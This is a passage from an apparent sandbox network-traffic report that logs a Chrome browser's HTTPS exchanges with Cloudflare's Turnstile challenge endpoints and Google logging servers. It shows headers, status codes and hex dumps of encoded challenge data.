                                                                                                                                                                                                                                  cf-chl-gen: v5S3fHT/hKKKoZrzyr5Rk06IzJ2W3cPW49wN+SU3CnyQlN5h2ICX/mfK74EJp20CVk152TqVY0p9vbFM7Y405YEtURplVK86EM7dWueVacUY2qToIwzhXZob7vhO9DDH+QwtTnlebeAbf06lzQzfU13RjlWi5r2Aj2WyvSg378i5jdBXwe99jrxGw3fZzgMTqsnp8jZGhaVYMQNmLY312SaP9ziCgzpVB2xDVHkd3wG0r4ZQUBko3nPHvrIjdcQrBGTpzv+Z6X1C3xZp7upFM5DBC38pVSP1k2rZnnUgyu6urFzpddVaL/7/3VWDc8/JlvM4dpViMOiz6FjF3M1l6f56JIXU21KoxBvY/hkbYrdC90nbs6VFYnLRCADlKuPXRQsOQAr5DHSwoitIxQ7Svq9koFjwQLy88A6GQXuORbWY4/snE6WoafLGMh1rMvLJOoonxpWZaL/BKBKQr44+wKsGIAYfVF+8f3/7dh04ytfZ6Ao=$1tBr+G4Y/1d3vW2x
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418efb0e9041ef-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC622INData Raw: 58 5a 46 79 54 6d 43 4f 56 6d 75 4d 56 33 31 37 65 59 71 64 69 6e 68 39 6e 35 4a 35 63 57 42 69 6f 32 6d 4e 6f 34 79 73 5a 34 52 73 64 4c 46 73 70 47 2b 6b 6f 33 56 33 66 4c 32 55 6d 72 4a 34 6d 37 6d 45 6d 4c 68 36 6b 59 69 73 68 71 61 38 6a 64 47 39 7a 39 44 56 79 35 4b 75 79 37 6d 35 33 4a 4c 4d 32 36 65 63 30 63 44 50 78 62 36 69 32 72 69 62 79 74 6e 71 72 61 61 74 71 37 33 70 76 4d 7a 46 37 63 44 51 78 4c 6e 4e 36 65 2f 65 7a 4e 44 42 75 38 47 2b 78 4c 2f 56 34 64 48 43 36 4e 7a 4e 78 63 33 4b 79 4e 2f 46 41 67 7a 7a 79 51 59 59 35 66 4c 33 38 78 51 59 36 39 50 72 46 64 37 7a 46 75 4c 33 42 53 77 4b 42 53 7a 71 48 67 6f 48 48 2b 30 68 4a 79 72 77 4e 44 63 78 38 68 4d 5a 4d 50 77 67 47 54 6f 53 49 7a 4e 42 47 41 59 2f 48 79 45 6b 50 6b 70 4d 43 43 67
                                                                                                                                                                                                                                  Data Ascii: XZFyTmCOVmuMV317eYqdinh9n5J5cWBio2mNo4ysZ4RsdLFspG+ko3V3fL2UmrJ4m7mEmLh6kYishqa8jdG9z9DVy5Kuy7m53JLM26ec0cDPxb6i2ribytnqraatq73pvMzF7cDQxLnN6e/ezNDBu8G+xL/V4dHC6NzNxc3KyN/FAgzzyQYY5fL38xQY69PrFd7zFuL3BSwKBSzqHgoHH+0hJyrwNDcx8hMZMPwgGToSIzNBGAY/HyEkPkpMCCg
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 5a 69 56 57 70 59 50 57 41 67 57 79 6c 41 4b 6b 5a 52 4c 45 74 6b 52 6a 6c 6b 63 46 67 30 4e 47 78 4d 57 44 78 39 64 54 39 54 66 7a 2b 4b 68 45 4e 6b 6a 6c 78 6e 63 47 31 7a 69 32 31 79 6a 46 4e 4b 6a 5a 64 54 68 6d 75 64 68 32 39 59 69 6f 4f 4e 62 35 78 31 6b 4a 32 44 65 4b 71 4d 72 5a 43 52 65 61 43 63 71 4b 2b 31 6a 33 65 57 75 49 68 36 76 58 72 41 69 5a 71 57 77 35 61 38 6c 4a 43 35 65 38 71 35 79 71 36 4f 7a 62 71 76 71 34 57 74 78 64 4b 4f 30 4e 65 75 30 39 7a 58 78 39 79 66 32 4c 76 58 33 65 4b 79 75 4d 6a 41 78 72 2f 6a 78 4b 71 39 71 73 50 41 35 4d 75 73 76 38 66 78 35 63 72 6e 31 39 66 52 37 2f 47 2b 79 39 2f 50 31 39 76 77 30 77 4c 58 34 4e 63 47 32 2b 44 62 43 74 37 54 33 77 37 69 30 2b 4d 53 35 68 66 6e 46 75 6f 66 36 78 72 75 47 74 59 51 42
                                                                                                                                                                                                                                  Data Ascii: ZiVWpYPWAgWylAKkZRLEtkRjlkcFg0NGxMWDx9dT9Tfz+KhENkjlxncG1zi21yjFNKjZdThmudh29YioONb5x1kJ2DeKqMrZCReaCcqK+1j3eWuIh6vXrAiZqWw5a8lJC5e8q5yq6Ozbqvq4WtxdKO0Neu09zXx9yf2LvX3eKyuMjAxr/jxKq9qsPA5Musv8fx5crn19fR7/G+y9/P19vw0wLX4NcG2+DbCt7T3w7i0+MS5hfnFuof6xruGtYQB
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 4a 51 79 34 70 54 6c 31 48 55 31 35 44 61 54 5a 44 53 30 64 50 55 6a 56 4c 65 55 34 2f 54 33 31 53 67 6c 4f 42 56 6f 70 58 68 56 71 46 51 6e 74 76 55 35 4f 49 5a 58 4a 6a 64 56 4a 79 62 4a 32 55 5a 35 56 71 63 46 6d 62 70 48 68 32 66 57 57 67 69 58 6d 6d 6d 47 68 6f 6e 6f 64 71 6b 59 4f 52 63 5a 56 32 69 58 4f 5a 6e 71 74 33 6e 61 4b 5a 65 36 47 6c 78 72 2b 32 76 73 65 36 69 5a 71 4e 7a 36 65 66 6b 61 75 47 7a 35 2b 76 77 5a 47 78 31 39 47 78 7a 70 72 62 6f 63 48 63 6e 74 62 69 76 62 65 32 6f 39 6a 69 37 74 6a 43 77 75 76 4a 72 76 44 66 74 63 4c 54 36 63 50 44 38 4e 36 32 30 4e 33 64 37 37 2f 52 34 37 67 44 79 4e 34 4d 32 2f 72 49 42 66 41 51 2f 64 76 4c 7a 73 37 53 34 2b 4c 6d 47 66 76 78 35 2f 63 4b 48 4f 30 52 47 67 54 78 2f 68 59 65 2b 52 7a 30 36 76
                                                                                                                                                                                                                                  Data Ascii: JQy4pTl1HU15DaTZDS0dPUjVLeU4/T31SglOBVopXhVqFQntvU5OIZXJjdVJybJ2UZ5VqcFmbpHh2fWWgiXmmmGhonodqkYORcZV2iXOZnqt3naKZe6Glxr+2vse6iZqNz6efkauGz5+vwZGx19GxzprbocHcntbivbe2o9ji7tjCwuvJrvDftcLT6cPD8N620N3d77/R47gDyN4M2/rIBfAQ/dvLzs7S4+LmGfvx5/cKHO0RGgTx/hYe+Rz06v
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 54 32 63 7a 64 31 67 30 53 56 68 6f 55 6c 52 62 58 55 46 30 56 6e 6c 78 51 45 57 45 63 6d 6c 6b 53 33 74 74 51 6f 5a 7a 63 58 2b 53 67 58 61 43 68 6e 64 34 66 58 56 2b 63 70 36 55 6e 61 43 42 62 34 4f 53 66 6d 47 68 66 35 68 31 67 6e 31 2f 67 35 43 42 74 49 56 75 69 6f 4a 32 65 5a 46 34 64 72 53 61 76 33 65 37 75 5a 71 63 73 36 43 33 70 62 32 4c 6e 71 69 45 75 73 61 4f 6e 4b 79 4d 6f 4d 6a 4f 72 38 58 54 79 5a 7a 56 30 37 76 5a 74 64 6d 5a 7a 63 4c 46 32 4d 4c 63 36 65 72 72 75 71 6e 47 37 39 44 6d 79 4e 2f 4c 31 63 4f 34 79 62 4c 4a 72 71 2f 6f 2b 73 44 73 32 4e 44 57 35 64 44 38 32 2f 58 67 2b 4f 72 57 45 4e 2f 4b 45 75 6e 7a 43 4f 50 49 7a 78 59 4d 36 41 63 57 7a 2f 58 61 2b 2f 76 30 49 42 62 69 37 69 6e 61 36 42 6a 36 4c 43 48 37 36 2b 6f 6f 2f 76 34
                                                                                                                                                                                                                                  Data Ascii: T2czd1g0SVhoUlRbXUF0VnlxQEWEcmlkS3ttQoZzcX+SgXaChnd4fXV+cp6UnaCBb4OSfmGhf5h1gn1/g5CBtIVuioJ2eZF4drSav3e7uZqcs6C3pb2LnqiEusaOnKyMoMjOr8XTyZzV07vZtdmZzcLF2MLc6erruqnG79DmyN/L1cO4ybLJrq/o+sDs2NDW5dD82/Xg+OrWEN/KEunzCOPIzxYM6AcWz/Xa+/v0IBbi7ina6Bj6LCH76+oo/v4
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 48 49 36 53 46 67 34 54 48 52 36 59 44 31 76 64 55 69 42 66 32 65 46 59 59 56 46 65 57 35 78 68 47 36 49 6c 5a 61 58 5a 6c 56 79 6e 48 71 54 67 48 70 33 6c 33 4f 53 67 59 39 6c 5a 4b 6c 6b 59 32 4e 6f 69 71 61 65 67 35 79 75 62 33 46 32 6c 34 65 4e 71 72 75 48 66 61 36 62 71 58 2b 67 64 5a 79 6d 66 38 53 44 66 37 6d 67 6e 4d 57 4c 70 73 61 63 71 5a 48 54 6c 4d 4f 6c 74 4c 6a 50 78 38 71 31 74 4a 2f 5a 79 5a 6a 55 7a 4d 62 52 33 37 2b 6b 34 4d 4b 36 79 75 37 62 33 64 37 54 38 38 79 7a 77 65 50 4c 7a 39 72 55 31 62 58 31 76 4e 7a 70 38 74 6e 6b 42 76 4c 78 38 2b 6e 48 31 2f 6a 47 36 41 76 37 44 64 7a 66 37 73 2f 56 45 66 54 73 46 77 73 54 37 64 6a 37 39 76 73 57 2f 52 4d 69 38 52 63 49 32 2b 6a 32 4c 50 6f 70 36 42 45 4f 48 4f 37 38 4e 69 7a 76 37 2f 51 58
                                                                                                                                                                                                                                  Data Ascii: HI6SFg4THR6YD1vdUiBf2eFYYVFeW5xhG6IlZaXZlVynHqTgHp3l3OSgY9lZKlkY2Noiqaeg5yub3F2l4eNqruHfa6bqX+gdZymf8SDf7mgnMWLpsacqZHTlMOltLjPx8q1tJ/ZyZjUzMbR37+k4MK6yu7b3d7T88yzwePLz9rU1bX1vNzp8tnkBvLx8+nH1/jG6Av7Ddzf7s/VEfTsFwsT7dj79vsW/RMi8RcI2+j2LPop6BEOHO78Nizv7/QX
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 39 7a 68 57 47 42 51 48 46 57 5a 55 53 45 57 30 57 49 62 6b 78 38 6c 49 4f 53 5a 6e 65 59 6b 34 65 47 65 56 4e 34 6b 34 6d 69 6f 48 69 62 59 35 61 51 6b 36 6d 59 61 70 52 2b 6c 71 53 51 70 58 39 37 6b 5a 36 73 72 35 57 4c 71 36 71 54 71 4b 79 32 73 49 78 36 66 4c 75 75 73 72 75 66 6b 59 53 4c 78 4b 4b 63 78 4b 57 61 75 34 71 4b 7a 36 4b 73 71 36 2b 74 33 4c 66 64 71 4e 58 4d 74 62 75 69 34 37 4b 39 77 4c 50 46 6f 73 4b 38 37 65 43 71 38 62 2b 2f 37 76 50 4d 76 2b 7a 6a 73 66 50 5a 37 2b 37 6e 7a 76 44 75 77 67 50 43 74 2f 44 54 31 66 33 4b 33 38 77 50 78 74 73 42 37 51 54 7a 30 67 6e 4e 43 76 63 58 43 77 73 4b 44 51 34 64 44 2b 6f 67 32 66 66 32 47 66 63 6d 48 77 6e 33 47 4f 63 4f 47 44 45 61 44 68 4d 78 49 42 4d 4b 45 6a 49 30 4c 43 73 56 4d 2f 48 35 51
                                                                                                                                                                                                                                  Data Ascii: 9zhWGBQHFWZUSEW0WIbkx8lIOSZneYk4eGeVN4k4mioHibY5aQk6mYapR+lqSQpX97kZ6sr5WLq6qTqKy2sIx6fLuusrufkYSLxKKcxKWau4qKz6Ksq6+t3LfdqNXMtbui47K9wLPFosK87eCq8b+/7vPMv+zjsfPZ7+7nzvDuwgPCt/DT1f3K38wPxtsB7QTz0gnNCvcXCwsKDQ4dD+og2ff2GfcmHwn3GOcOGDEaDhMxIBMKEjI0LCsVM/H5Q
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 4a 64 33 35 63 53 57 78 37 59 6b 2b 46 58 34 52 73 68 33 64 57 6a 46 46 70 61 5a 46 63 56 33 75 69 57 6d 2b 55 67 4b 65 48 5a 70 79 59 6c 6d 5a 73 71 4b 43 78 61 47 2b 68 69 70 4b 31 6a 61 4e 35 6b 35 6d 50 65 58 5a 33 72 4b 42 37 72 73 4f 76 70 4a 79 37 71 6f 58 46 67 70 71 57 6a 35 76 46 73 34 2f 4a 71 72 54 51 72 37 4b 30 78 61 6e 5a 76 71 6d 72 73 37 79 69 6f 4c 69 6c 70 4e 79 62 78 62 79 37 76 39 36 2f 79 63 36 6b 7a 64 2f 64 37 39 62 79 79 39 69 34 38 4e 7a 75 75 4c 4c 5a 34 64 55 45 39 66 76 39 78 41 50 5a 77 67 44 4e 39 67 59 48 79 76 41 4f 33 4e 58 32 31 2b 62 30 7a 42 59 4e 2b 75 37 62 34 42 33 75 33 68 63 53 49 65 4c 30 4b 67 55 49 4c 52 59 4a 41 6a 49 77 36 66 77 43 44 2b 37 32 46 51 34 6a 38 51 77 59 46 44 41 68 41 54 49 43 48 6b 55 38 2f 6b
                                                                                                                                                                                                                                  Data Ascii: Jd35cSWx7Yk+FX4Rsh3dWjFFpaZFcV3uiWm+UgKeHZpyYlmZsqKCxaG+hipK1jaN5k5mPeXZ3rKB7rsOvpJy7qoXFgpqWj5vFs4/JqrTQr7K0xanZvqmrs7yioLilpNybxby7v96/yc6kzd/d79byy9i48NzuuLLZ4dUE9fv9xAPZwgDN9gYHyvAO3NX21+b0zBYN+u7b4B3u3hcSIeL0KgUILRYJAjIw6fwCD+72FQ4j8QwYFDAhATICHkU8/k
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 54 59 53 50 58 6f 68 6b 5a 47 4f 4e 56 58 70 7a 5a 35 42 78 58 46 61 4f 65 6d 4f 52 59 5a 4b 55 58 32 57 57 63 34 4f 4a 71 36 32 42 59 32 71 7a 62 57 75 43 6a 34 65 78 6a 6f 69 48 64 59 31 37 64 6f 32 73 74 70 65 62 6d 59 57 6a 79 5a 54 46 76 59 71 57 7a 5a 75 6a 70 73 75 47 76 37 4f 58 31 38 79 70 74 71 65 35 6c 72 61 77 34 64 57 67 76 2b 47 35 34 65 65 66 74 39 37 58 79 74 2f 4e 34 2b 4c 65 72 61 7a 79 78 37 44 56 37 65 62 78 36 4d 7a 34 74 73 33 74 74 50 62 2b 38 4d 44 63 77 2f 54 44 33 50 73 41 41 67 72 49 2f 51 7a 4d 45 65 50 4e 30 66 58 52 32 51 72 61 43 76 59 4c 41 74 7a 33 34 64 37 65 49 39 30 54 35 75 67 44 46 2b 77 63 44 79 72 77 4c 41 73 77 39 51 34 6c 4d 76 67 32 50 44 37 33 4f 7a 30 76 41 68 6e 35 4f 6a 55 6f 52 41 55 68 49 42 59 58 50 41 35
                                                                                                                                                                                                                                  Data Ascii: TYSPXohkZGONVXpzZ5BxXFaOemORYZKUX2WWc4OJq62BY2qzbWuCj4exjoiHdY17do2stpebmYWjyZTFvYqWzZujpsuGv7OX18yptqe5lraw4dWgv+G54eeft97Xyt/N4+Lerazyx7DV7ebx6Mz4ts3ttPb+8MDcw/TD3PsAAgrI/QzMEePN0fXR2QraCvYLAtz34d7eI90T5ugDF+wcDyrwLAsw9Q4lMvg2PD73Oz0vAhn5OjUoRAUhIBYXPA5
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 59 68 71 64 6e 57 52 6a 6e 57 4f 63 32 39 59 65 33 2b 44 68 4a 46 6e 70 5a 68 70 63 32 5a 37 62 70 32 63 68 62 43 6b 72 58 42 76 70 34 79 6e 75 71 79 4f 75 72 4f 4d 72 61 75 6a 6e 48 76 44 66 70 79 6a 79 5a 37 44 6d 34 69 6e 77 37 6d 4b 6d 35 4c 56 6e 36 79 56 79 63 47 71 31 36 65 76 73 75 43 72 32 61 37 5a 6c 73 2f 44 70 2b 66 63 75 63 61 33 79 61 62 47 77 50 48 6c 37 76 50 53 35 65 7a 6a 73 73 33 5a 37 2b 37 36 75 62 6a 2b 34 76 7a 78 76 77 44 31 31 50 77 4c 34 63 62 64 41 4e 76 4c 7a 66 41 41 34 64 44 7a 35 51 62 77 34 78 4c 61 45 66 59 4c 32 74 34 66 49 51 2f 6a 46 42 63 65 49 78 72 71 41 4f 51 44 43 2f 77 79 42 78 48 6d 4a 68 63 74 43 7a 6f 62 4f 51 76 30 2f 54 45 56 50 2f 30 39 46 55 56 42 2f 52 4d 43 43 69 63 6f 50 67 34 72 49 6c 4d 2b 4b 79 64 47
                                                                                                                                                                                                                                  Data Ascii: YhqdnWRjnWOc29Ye3+DhJFnpZhpc2Z7bp2chbCkrXBvp4ynuqyOurOMraujnHvDfpyjyZ7Dm4inw7mKm5LVn6yVycGq16evsuCr2a7Zls/Dp+fcuca3yabGwPHl7vPS5ezjss3Z7+76ubj+4vzxvwD11PwL4cbdANvLzfAA4dDz5Qbw4xLaEfYL2t4fIQ/jFBceIxrqAOQDC/wyBxHmJhctCzobOQv0/TEVP/09FUVB/RMCCicoPg4rIlM+KydG


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  35192.168.2.1649782104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:55 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:55 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:55 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  cf-chl-out: LT+1e6yO4bumyIjWsDEuK1DrFNvDrdUnHBk=$lSgpbkhXq8ba+bl7
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f0a98e00f71-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  36192.168.2.1649784104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:55 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f418ee08bfa41f8/1734550133132/ce2a6eec6335e51e65b8256666d1557c63e830bea0bac4bd859dd894be18f968/HOSmDxED5TPSN8H HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:56 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:56 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 1
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:28:56 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 7a 69 70 75 37 47 4d 31 35 52 35 6c 75 43 56 6d 5a 74 46 56 66 47 50 6f 4d 4c 36 67 75 73 53 39 68 5a 33 59 6c 4c 34 59 2d 57 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gzipu7GM15R5luCVmZtFVfGPoML6gusS9hZ3YlL4Y-WgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                  2024-12-18 19:28:56 UTC1INData Raw: 4a
                                                                                                                                                                                                                                  Data Ascii: J


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  37192.168.2.1649789104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:57 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f418ee08bfa41f8/1734550133133/5r7qG9mw9MML0Vh HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:58 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:57 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f19ff4443a9-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3f 00 00 00 3a 08 02 00 00 00 88 f0 16 3b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR?:;IDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  38192.168.2.1649792142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                  Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:59 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  39192.168.2.1649793142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                  Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
